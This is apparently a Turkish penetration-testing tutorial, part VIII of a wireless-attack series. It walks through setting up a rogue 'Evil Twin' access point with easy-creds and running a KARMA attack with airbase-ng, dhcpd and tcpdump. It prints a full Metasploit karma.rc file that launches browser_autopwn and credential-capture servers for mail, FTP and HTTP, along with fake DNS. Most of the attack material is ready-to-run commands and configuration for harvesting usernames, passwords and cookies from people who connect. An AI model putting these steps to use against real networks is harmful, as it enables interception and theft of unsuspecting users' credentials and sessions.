Sızma Testlerinde Kablosuz Ağlar ve Atak Vektörleri – VIII

Sahte Erişim Noktası (AP) Kurulumu ve Trafik İnceleme

Sahte AP yayını, kurum isimleriyle veya insanların ilgisini çekebilecek bir SSID’yle bir kablosuz ağ yayını yapmayı ifade eder. Bir nevi sosyal mühendislik saldırısı olan bu atakta kullanıcılar ağa bağlanır ve internete çıkarlar. Bütün trafikleri sahte AP üzerinden geçtiği için arp zehirleme, dns zehirleme gibi mitm saldırıları veya oturum çalmak için sidejacking ataklar yapmak mümkündür.
Bu atak bazen Evil Twin ismiyle de anılır. Zaten var olan hedef AP’nin tüm özellikleri saldırgan tarafından tespit edilir ve bu özelliklerle gerçek AP’den daha güçlü bir yayın yapılarak kullanıcıların bağlanması beklenir.
Bu amaçla kullanılacak araç easy-creds’tir. Bu araç aslında diğer bir çok aracı isteğimiz yönde yapılandırır ve işleri çok kolaylaştırır. Gerekli olan araçların listesi şöyledir:


* screen
* freeradius (with wpe patches)
* hamster
* ferret
* sslstrip
* dsniff
* urlsnarf
* metasploit
* airbase-ng
* airodump-ng
* hostapd
* mdk3
* ipcalc
* asleap


Bunların bir çoğu halihazırda Kali üzerinde yüklüdür. Olmayan araçların kurulumu için github sayfası yardımcı olabilir.


unzip master.zip
./installer.sh


ile indirilir. Zip dosyası çıkartılır ve Bash dosyası çalıştırılır. Kurulum adımları takip edilir ve kurulum tamamlanır. easy-creds /opt dizini altına kurulur. Direk olarak


easy-creds
ile çağırılır. Aşağıdaki seçenekleri bize sunar.


1.  Prerequisites & Configurations
2.  Poisoning Attacks
3.  FakeAP Attacks
4.  Data Review
5.  Exit
q.  Quit current poisoning session
Choice:


Sahte AP yayını için sırasıyla
3. FakeAP Attacks
1. FakeAP Attack Static
seçilir.


Would you like to include a sidejacking attack? [y/N]: N


1. soruya N(No=Hayır) yazılır ya da enter tuşuyla geçilir.
2. adımda internete bağlı arayüzü sorar, eğer Kaliyi sanal makine üzerinde kullanıyorsak buna muhtemelen eth0 yazılır. Örnek: eth0
3. adımda sahte yayını yapılacağı arayüzü sorar; wlan0, wlan1 gibi. Örnek: wlan1
4. adımda sahte AP yayını için SSID’yi sorar. Burada kurum adı veya FreeWifi gibi insanların ilgisini çekebilecek bir SSID girilir. Örnek: TTNET WiFi
5. adımda kanal numarası girilir. 1, 6, 11 tercih edilir. Örnek: 6
6. adımda easy-creds wlan1 arayüzünü monitor moda geçirir ve bunu yazarız. Örnek:mon0
7. adımda MAC adresi değiştirmek istiyor musun diye sorar. Örnek: N
8. adımda kurban kullanıcıların bağlanacağı kablosuz arayüz belirtilir. Bu arayüze gelen trafik internetin olduğu arayüze(eth0) köprülenecektir. Örnek: at0
9. adımda kullanıcılara verilecek IP için DHCP konfigürasyon dosyası var mı diye sorar. N tercih edilir. Örnek: N
10. adımda kullanıcıların hangi subnetten IP alacağı belirtilir. Örnek: 10.0.0.0/24
Not: eğer dhcp’nin başlatılamadığı ile ilgili bir hata alınıyorsa easy-creds.sh dosyası açılarak 731. satırda dhcpd3, dhcpd ile değiştirilebilir.
11. adımda DNS sunucusu girilir. Örnek: 192.168.2.1(Modem IP’si)
Böylece easy-creds Airbase-ng’yi çalıştırarak yayın başlar. Sonra DMESG, SSLStrrip, ettercap, URL snaff ve dnsiff küçük pencerelerde açılır. easy-creds’de başlangıçtaki menüsüne döner.


Bir kullanıcı ağa bağlandığında Airbase-ng penceresinde şu şekilde görülür.



Yakalanan verileri görüntülemek için 4. Data Review seçilir ve hangi aracın çıktısı görüntülenmek isteniyorsa o numara girilir. Örnek: 3.
easy-creds bize log dosyasının yerini gösterir ve bize tam yolu girmemizi ister.


Ettercap logs in current log folder:
/root/easy-creds-2014-07-20-1424/ettercap2014-07-20-1425.eci
Enter the full path to your ettercap.eci log file: /root/easy-creds-2014-07-20-1424/ettercap2014-07-20-1425.eci


Kopyala – yapıştır yapılarak yol belirtildiğinde aşağıdaki gibi küçük bir pencere açılır ve URL,kullanıcı adı, parola bilgisi listelenir.

Karmasploit

İlk olarak KARMA ismiyle ortaya çıkan Karmetasploit, sahte AP yayını yaparak istemcilerin bağlandıkları her isteğe cevap vermeyi amaçlıyordu. Sahte AP’ye bağlanan istemcinin web, FTP, DNS gibi servisler için her isteğine metasploitin halihazırda yüklü olan modülleriyle cevap verilir. Ancak burada KARMA’nın sahte AP yayını yapmaktan çok önemli bir farkı vardır. Bilgisayarlar Probe Requestler ile daha önce başarıyla bağlandıkları AP’lerin SSIDleri için yayın yaparlar. Normal şartlarda bilgisayarlar daha önce bağlandığı(güvendiği) bir ağın, etrafta daha kaliteli yayın yaptığını farkederse otomatik olarak ona bağlanır. KARMA ise işe bu noktada dahil olur. Probe Requestlerde yer alan her SSID için Beacon frameler yayınlar. Eğer birisi etrafta KARMA ile ava çıktıysa daha önce bağlanılan bütün AP’ler yayındaymış gibi görülebilir. Bunlardan herhangi birisine bağlanılmaya çalışıldığında ise ağ şifreli gözükse dahi sahte AP’e bağlanılır.


Saldırı için öncelikle DHCP servisi yapılandırılmalıdır. Bunun için aşağıdaki değerler /etc/dhcp/dhcpd.conf dosyası içine yazılır. (locate dhcpd.conf komutu ile dosyanın nerede bulunduğuna dair fikir edinilebilir.)


default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
 range 10.0.0.100 10.0.0.254;
 option routers 10.0.0.1;
 option domain-name-servers 10.0.0.1;
}


Sahte AP yayını yapılacak arayüz monitor moda geçirilir


airmon-ng start wlan1


Ardından airbase-ng aracı ile yayına başlanır. BGA_Wifi yerine istenilen SSID yazılabilir.


airbase-ng -P -C 30 -e “BGA_WiFi” -v mon0


Airbase-ng default olarak at0 diye bir arayüz oluşturacaktır. Bu arayüz için IP ve ağ maskesi verilir.


ifconfig at0 up 10.0.0.1 netmask 255.255.255.0


Bağlanacak kullanıcılara IP verebilmek için dhcpd biraz önce oluşturulan dhcpd.conf dosyası ile yapılandırılır.


dhcpd -cf /etc/dhcp/dhcpd.conf at0


tcpdump ile at0 ağ arayüzüne gelen tüm trafik yakala dosyasına kaydedilebilir.


tcpdump -tttnn -i at0 -w yakala


Ve son olarak içinde metasploit modülleri ve gerekli ayarlar bulunan karma.rc dosyası msfconsole tarafından okutulur.


msfconsole -r karma.rc


karma.rc dosya içeriği aşağıdaki gibidir. Bütün servisler(pop3(s),imap(s),ftp,smtp,http(s),dns) yerine sadece belirli servislerde çalıştırılabilir.


use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads
run
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run
use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run
use auxiliary/server/capture/ftp
run
use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run

use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run
use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run
use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 5353
run
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 53
run
use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 8080
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run
use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
run


airbase-ng başlatıldğında şöyle bir çıktı verir


root@kali:/etc/dhcp# airbase-ng -P -C 30 -e “BGA_WiFi” -v mon0
20:32:44  Created tap interface at0
20:32:44  Trying to set MTU on at0 to 1500
20:32:44  Trying to set MTU on mon0 to 1800
20:32:44  Access Point with BSSID A0:F3:C1:27:BF:E8 started.
Error: Got channel -1, expected a value > 0.
20:33:07  Got broadcast probe request from 00:23:08:E9:B4:DF
20:33:07  Got broadcast probe request from 00:23:08:E9:B4:DF
..


Aşağıdaki 2 ekran görüntüsünde yer alan bütün SSID’ler sahtedir. Hiçbirisi civarda yayın yapmamaktadır.



Sahte AP’ye bir istemci bağlandığında aşağıdaki gibi bir çıktı verir.



Örnek olarak yahoo’ya erişilmeye çalışıldığında IP olarak 10.0.0.1 görülmekte ve farklı bir sayfa gelmektedir.



Metasploit tüm istekleri takip eder.


Bunların arasında cookie bilgileride vardır.